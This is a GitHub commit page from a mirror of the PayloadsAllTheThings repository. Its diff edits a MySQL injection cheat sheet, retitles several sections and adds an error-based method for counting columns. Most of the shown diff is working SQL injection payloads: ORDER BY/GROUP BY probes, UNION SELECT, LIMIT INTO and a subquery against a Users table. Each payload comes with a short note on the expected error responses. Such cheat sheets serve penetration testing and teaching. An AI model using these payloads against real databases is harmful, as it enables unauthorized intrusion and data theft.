ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Update Detect columns number

Browse Source 
Using SELECT * FROM SOME_EXISTING_TABLE Error Based
This commit is contained in:
nizam0906 2019-10-29 18:11:58 +05:30 committed by GitHub
parent 614e8a97b9
commit 7d6fab92fa
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
SQL Injection/MySQL Injection.md
View File

@ -50,7 +50,7 @@
First you need to know the number of columns
#### using `order by` or `group by`
##### Using `order by` or `group by`
Keep incrementing the number until you get a False response.
Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
@ -70,7 +70,7 @@ or
1' GROUP BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
```
#### using `order by` or `group by` Error Based
##### Using `order by` or `group by` Error Based
Similar to the previous method, we can check the number of columns with 1 request if error showing is enabled.
```sql
1' ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+
@ -87,7 +87,7 @@ or
# This error means query uses 3 column
#-1' UNION SELECT 1,2,3--+ True
```
#### using `UNION SELECT` Error Based
##### Using `UNION SELECT` Error Based
This method works if error showing is enabled
```sql
1' UNION SELECT @--+ #The used SELECT statements have a different number of columns
@ -95,7 +95,7 @@ This method works if error showing is enabled
1' UNION SELECT @,@,@--+ #No error means query uses 3 column
#-1' UNION SELECT 1,2,3--+ True
```
#### using `LIMIT INTO` Error Based
##### Using `LIMIT INTO` Error Based
This method works if error showing is enabled.
It is useful for finding the number of columns when the injection point is after a LIMIT clause.
@ -105,6 +105,16 @@ It is useful for finding the number of columns when the injection point is after
1' LIMIT 1,1 INTO @,@,@--+ #No error means query uses 3 column
#-1' UNION SELECT 1,2,3--+ True
```
##### Using `SELECT * FROM SOME_EXISTING_TABLE` Error Based
This works if you know the table name you're after and error showing is enabled.
It will return the amount of columns in the table, not the query.
```sql
1' AND (SELECT * FROM Users) = 1--+ #Operand should contain 3 column(s)
# This error means query uses 3 column
#-1' UNION SELECT 1,2,3--+ True
```
### Extract database with information_schema
Then the following codes will extract the databases'name, tables'name, columns'name.